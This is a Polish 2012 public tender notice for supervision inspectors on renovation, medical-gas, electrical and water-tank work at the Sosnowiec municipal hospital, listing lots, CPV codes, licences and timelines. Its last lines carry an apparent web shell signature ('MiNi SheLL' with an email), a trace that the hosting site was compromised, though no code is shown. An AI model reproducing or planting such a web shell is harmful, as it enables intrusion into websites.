<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany czas realizacji: 2 miesiące
Przewidywany termin realizacji: maj/czerwiec - lipiec/sierpień 2012
Wymagania kwalifikacyjne:
Uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 23 ust.1 rozporządzenia (1)
oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust.. 2,3 ustawy (3)
Wynagrodzenie umowne: ryczałt
 Charakterystyka robót zgodnie ze Wspólnym Słownikiem Zamówień CPV
 Roboty budowlane związane z budową instalacji gazów medycznych - stacji rozprężania 
 tlenu i  przyłącza instalacji tlenu
 Kod CPV:45333000-0 - instalacje gazów
 Kod CPV:45311200-2 - instalacje elektryczne  
A.	Budowa instalacji wewnętrznej gazów medycznych wraz z przynależną infrastrukturą techniczną i budowlaną dla budynków szpitalnych przy 
      ul. Zegadłowicza 3 i Szpitalnej 1

Roboty budowlane związane budową stacji rozprężania tlenu medycznego składającej się z dwu baterii po 12 butli (każda o pojemności 40 l), dwustopniowej automatycznej tablicy redukcyjnej CENT  11B z reduktorami o wydajności min.75 Nm3/h i awaryjnej stacji z baterią 6 butlową z I stopniem redukcji  tj tablicą awaryjną CENT 01C, podłączoną do reduktora II stopnia o wydajności  min. 75 Nm3/h. wraz z sygnalizacją alarmową stacji rozprężania tlenu,- instalacji elektrycznej w stacji rozprężania tlenu, przyłącze instalacji tlenu , zewnętrznej linii kablowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET B.1.
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W BRANŻY KONSTRUKCYJNO - BUDOWLANEJ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany czas realizacji: 6 miesięcy:
Przewidywany termin realizacji: maj czerwiec - listopad grudzień 2012
Wymagania kwalifikacyjne:
Uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności konstrukcyjno-budowlanej zgodnie z § 17 ust.1 rozporządzenia (1)
oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust.. 2,3 ustawy (3)

Wynagrodzenie umowne: płatne miesięcznie.

Charakterystyka robót zgodnie ze Wspólnym Słownikiem Zamówień CPV

-  roboty przygotowawcze - zagospodarowanie terenu budowy kod  4510000-8   
-  rozbiórki i demontaże Kod  45111100-9 
-  różne elementy wyposażenia i umeblowania Kod 45421151-7 , Kod 45421145-2 , 
Kod 45421153-1  
- sufity podwieszane Kod 45421146-9 
- rozbiórki i demontaże Kod  45111100-9 
- tynkowanie Kod 45410000-4   
- roboty izolacyjne Kod 45320000-6  
- instalowanie  ścianek  działowych,  obudowa pionów sanitarnych i kanałów wentylacyjnych Kod 45421152-4 
- roboty w zakresie stolarki budowlanej Kod  45421000-4  
- kładzenie i wykładanie podłóg Kod 45432100-5  
-  roboty malarskie Kod 45442100-8  
- kładzenie płytek ceramicznych na ścianach Kod  45431000-7    
Projekty budowlane i przebudowa budynków szpitalnych w tym oddziałów szpitalnych wraz z przynależną infrastrukturą i wyposażeniem przy ul. Zegadłowicza 3 i ul. Szpitalnej 1- realizacja w etapach.

 Przebudowa pomieszczeń w budynku szpitalnym  dla potrzeb oddziałów szpitalnych:
 kod CPV 45215140-0 

- III p. budynek główny - dla potrzeb obszaru rehabilitacji - powierzchnia użytkowa ok 1 100 m2 
- IV p. budynek boczny - dla potrzeb obszaru geriatrii - powierzchnia użytkowa ok 300 m2 
- V p. budynek boczny - dla potrzeb obszaru dermatologii - powierzchnia użytkowa ok 300 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET B.2. 
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W BRANŻY INSTALACYJNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany czas realizacji: 6 miesięcy:
Przewidywany termin realizacji: maj/czerwiec - listopad/grudzień 2012
Wymagania kwalifikacyjne:
Uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 23 ust.1 rozporządzenia (1)
oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust.. 2,3 ustawy (3)

Wynagrodzenie umowne: płatne miesięcznie.

Charakterystyka robót zgodnie ze Wspólnym Słownikiem Zamówień CPV
-  Instalacja co Kod CPV 45331100-7 
-  Instalacja wod-kan  Kod CPV 45332000-3
-  Instalacja wentylacji mechanicznej Kod CPV 45331200-8 
-  Roboty demontażowe Kod CPV 45111100-9
-  Instalacja gazów medycznych Kod CPV 45333000-0
Projekty budowlane i przebudowa budynków szpitalnych w tym oddziałów szpitalnych wraz z przynależną infrastrukturą i wyposażeniem przy ul. Zegadłowicza 3 i ul. Szpitalnej 1- realizacja w etapach.

 Przebudowa pomieszczeń w budynku szpitalnym  dla potrzeb oddziałów szpitalnych:
 kod CPV 45215140-0 

- III p. budynek główny - dla potrzeb obszaru rehabilitacji - powierzchnia użytkowa ok 1 100 m2 
- IV p. budynek boczny - dla potrzeb obszaru geriatrii - powierzchnia użytkowa ok 300 m2 
- V p. budynek boczny - dla potrzeb obszaru dermatologii - powierzchnia użytkowa ok 300 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET B.3.
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W BRANŻY INSTALACJI ELEKTRYCZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany czas realizacji: 6 miesięcy:
Przewidywany termin realizacji: maj/czerwiec - listopad/grudzień 2012
Wymagania kwalifikacyjne:
Uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 24 ust.1 rozporządzenia (1)
oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust.. 2,3 ustawy (3)

Wynagrodzenie umowne: płatne miesięcznie.

Charakterystyka robót zgodnie ze Wspólnym Słownikiem Zamówień
- Roboty w zakresie montażu rozdzielnic elektrycznych CPV 45311100-2
- Roboty w zakresie przewodów instalacji elektrycznej CPV 45311100-1
- Roboty w zakresie montażu rozdzielnic elektrycznych CPV 45311100-5
- Roboty w zakresie opraw elektrycznych CPV 45311200-2 


Projekty budowlane i przebudowa budynków szpitalnych w tym oddziałów szpitalnych wraz z przynależną infrastrukturą i wyposażeniem przy ul. Zegadłowicza 3 i ul. Szpitalnej 1- realizacja w etapach.

 Przebudowa pomieszczeń w budynku szpitalnym  dla potrzeb oddziałów szpitalnych:
 kod CPV 45215140-0 

- III p. budynek główny - dla potrzeb obszaru rehabilitacji - powierzchnia użytkowa ok 1 100 m2 
- IV p. budynek boczny - dla potrzeb obszaru geriatrii - powierzchnia użytkowa ok 300 m2 
- V p. budynek boczny - dla potrzeb obszaru dermatologii - powierzchnia użytkowa ok 300 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET C.1.
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W BRANŻY KONSTRUKCYJNO - BUDOWLANEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany czas realizacji: 4 miesiące:
Przewidywany termin realizacji: maj/czerwiec - wrzesień/październik 2012
Wymagania kwalifikacyjne:
Uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności konstrukcyjno-budowlanej zgodnie z § 17 ust.1 rozporządzenia (1)
rozporządzenia (1), 2-letnia praktyka zawodowa na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków zgodnie z wymaganiami określonymi w § 24 ust. 2  rozporządzenia ( 2 ) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust.. 2,3 ustawy (3)

Wynagrodzenie umowne płatne miesięcznie.

 Charakterystyka robót zgodnie ze Wspólnym Słownikiem Zamówień
-Kod CPV 45000000-7
-Kod CPV 45111200  roboty w zakresie  przygotowania terenu /obiektu/ pod budowę, roboty ziemne, roboty demontażowe
-Kod CPV 45262300-4 roboty w zakresie betonowania, zbrojenia,  
-Kod 45262300 - betonowanie
-Kod CPV 45410000-4 tynkowanie, malowanie 

C.	Projekt zasilania w energię elektryczną, podstawowego i rezerwowego, budynków szpitalnych Szpitala Miejskiego w Sosnowcu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET C.2.
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W BRANŻY INSTALACJI ELEKTRYCZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany czas realizacji: 4 miesiące
Przewidywany termin realizacji: maj/czerwiec - wrzesień/październik 2012
Wymagania kwalifikacyjne:
Uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 24 ust.1 rozporządzenia (1), oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust.. 2,3 ustawy (3)

Wynagrodzenie umowne płatne miesięcznie.

Charakterystyka robót zgodnie ze Wspólnym Słownikiem Zamówień
-Kody CPV 45310000-3; 45311000-0 roboty w zakresie  wykonanie instalacji oświetleniowej , wykonanie instalacji gniazd ,wykonanie instalacji odgromowej oraz połączeń wtyczkowych wyrównawczych,   wykonanie instalacji głównego wyłącznika prądu  ochrona przeciwporażeniowa  
-Kod CPV  45314200-3 roboty w zakresie  budowy linii kablowych i robót ziemnych  
-Kod CPV  45310000-3; 32420000-3 roboty w zakresie  pomiarów instalacji elektrycznej urządzenia sieciowe
-Kod CPV  48329000-0 roboty w zakresie systemu obrazowania i archiwizowania


C. Projekt zasilania w energię elektryczną, podstawowego i rezerwowego, budynków szpitalnych Szpitala Miejskiego w Sosnowcu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET D.1.
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W BRANŻY KONSTRUKCYJNO BUDOWLANEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany czas realizacji: 4 miesiące
Przewidywany termin realizacji: maj/czerwiec - październik/listopad 2012
Wymagania kwalifikacyjne:
Uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności konstrukcyjno-budowlanej zgodnie z § 17 ust.1 rozporządzenia (1), 2-letnia praktyka zawodowa na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków zgodnie z wymaganiami określonymi w § 24 ust. 2 rozporządzenia ( 2 ) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust.. 2,3 ustawy (3)

Wynagrodzenie umowne: płatne miesięcznie.

Charakterystyka robót zgodnie ze Wspólnym Słownikiem Zamówień
45000000-7 Roboty budowlane. 
45100000-8 Przygotowanie terenu pod budowę. 
45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej. 
45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych 
45110000-1 Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne. 
45320000-6 Roboty izolacyjne 
45430000-0 Pokrywanie ścian i podłóg 
45440000-3 Roboty malarskie i szklarskie 
45450000-6 Roboty budowlane wykończeniowe, pozostałe. 
45113000-2 Roboty na placu budowy
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne. 
45111291-4 Roboty w zakresie zagospodarowania terenu. 
45262400-5 Wznoszenie konstrukcji ze stali konstrukcyjnej 
45262500-6 Roboty murarskie 
45262650-2 Okładziny 
45261000-4 Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty 
45442100-8 Roboty malarskie 
45421100-5 Instalowanie drzwi i okien i podobnych elementów 
45314300-4 Instalowanie infrastruktury okablowania 
45314310-7 Układanie kabli 
45231400-9 Roboty budowlane w zakresie budowy linii energetycznych 
45310000-3 Roboty w zakresie instalacji elektrycznych 
45311100-1 Roboty w zakresie przewodów instalacji elektrycznej 
45311200-2 Roboty w zakresie opraw elektrycznych 
45255600-5 Roboty w zakresie kładzenia rur w kanalizacji 
45314310-7 Układanie kabli 

Budowa zbiornika na wodę pitną o pojemności 62 [m3] wraz z budową budynku hydroforni oraz przebudową wewnętrznej sieci wodociągowej, doprowadzeniem  do  budynku  hydroforni  oraz  zbiornika  kabla elektroenergetycznego,  napowietrznej  linii  telekomunikacyjnej  oraz przyłącza  kanalizacyjnego  przy  ul.  Szpitalnej  1  w  Sosnowcu       na dz. nr 1288/2, obręb Zagórze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET D.2.
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W BRANŻY INSTALACYJNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany czas realizacji: 4 miesiące
Przewidywany termin realizacji: maj/czerwiec - październik/listopad 2012
Wymagania kwalifikacyjne:
Uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 24 ust.1 rozporządzenia (1), oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust.. 2,3 ustawy (3)

Wynagrodzenie umowne: płatne miesięcznie.

 Charakterystyka robót zgodnie ze Wspólnym Słownikiem Zamówień CPV
45232460-4 Roboty sanitarne 
52231000-7 montaż konstrukcji metalowych 
45231112-3  Instalacja rurociągów 
45232151-5  Węzły do przepompowywania wody 
45112500-0  Usuwanie gleby 
45112100-6  Roboty w zakresie kopania rowów 
45231300-8  Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków 
25233200-5  Zbiorniki z tworzyw sztucznych 
45510000-5  Wynajem dźwigów wraz z obsługą operatorską 


Budowa zbiornika na wodę pitną o pojemności 62 [m3] wraz z budową budynku hydroforni oraz przebudową wewnętrznej sieci wodociągowej, doprowadzeniem  do  budynku  hydroforni  oraz  zbiornika  kabla elektroenergetycznego,  napowietrznej  linii  telekomunikacyjnej  oraz przyłącza  kanalizacyjnego  przy  ul.  Szpitalnej  1  w  Sosnowcu       na dz. nr 1288/2, obręb Zagórze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET E.1.
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W BRANŻY KONSTRUKCYJNO BUDOWLANEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany czas realizacji: 2 miesiące część I i 2 miesiące część II
Przewidywany termin realizacji: maj/czerwiec - czerwiec/lipiec 2012

Wymagania kwalifikacyjne:
Uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności konstrukcyjno-budowlanej zgodnie z § 17 ust.1 rozporządzenia (1) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust.. 2,3 ustawy (3)

Wynagrodzenie umowne: ryczałtowe.

Charakterystyka robót zgodnie ze Wspólnym Słownikiem Zamówień CPV
Kod CPV 45215140-0  Roboty budowlane w zakresie obiektów szpitalnych  
Kod CPV 45113000-2   Roboty na placu budowy 
Kod CPV 45111100-9   Roboty w zakresie burzenia 
Kod CPV 45421134-2   Roboty w zakresie usuwania gruzu 
Kod CPV  45262522-6  Roboty murarskie  
Kod CPV 45262300-4   Betonownie 
Kod CPV 45421141-4   Instalowanie ścianek działowych
Kod CPV 45320000-6   Roboty izolacyjne 
Kod CPV 45410000-4   Tynkowanie
Kod CPV 45421111-5   Instalowanie metalowych framug 
Kod CPV 45421114-6   Instalowanie drzwi metalowych 
Kod CPV 45421000-4   Roboty w zakresie stolarki budowlanej   
Kod CP V 45431100-8  Kładzenie terakoty   
Kod CPV 45432111-5   Kładzenie wykładzin elastycznych 
E.	Remont    części pomieszczeń piwnicznych szpitala w celu wykonania zespołów szatniowo - sanitarnych.

Remont pomieszczeń sanitarnych o powierzchni użytkowej I część w segmencie B ok 150 m2 i II część w segmencie A ok 170 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET E.2.
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W BRANŻY INSTALACYJNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany czas realizacji : 2 miesiące część I i 2 miesiące część II
Przewidywany termin realizacji: maj/czerwiec - listopad/grudzień 2012
Wymagania kwalifikacyjne:
Uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 24 ust.1 rozporządzenia (1), oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust.. 2,3 ustawy (3)

Wynagrodzenie umowne: ryczałtowe.

Charakterystyka robót zgodnie ze Wspólnym Słownikiem Zamówień CPV

Kod CPV  45330000-9  Hydraulika i roboty sanitarne  
Kod CPV  45331100-7  Instalowanie centralnego ogrzewania 
Kod CPV 45442120-4   Malowanie budowli i zakładanie okładzin ochronnych  
Kod CPV 45331210-1   Instalowanie wentylacji 
Kod CPV 45315100-9   Instalacyjne roboty elektryczne 

Remont pomieszczeń sanitarnych o powierzchni użytkowej I część w segmencie B ok 150 m2 i II część w segmencie A ok 170 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com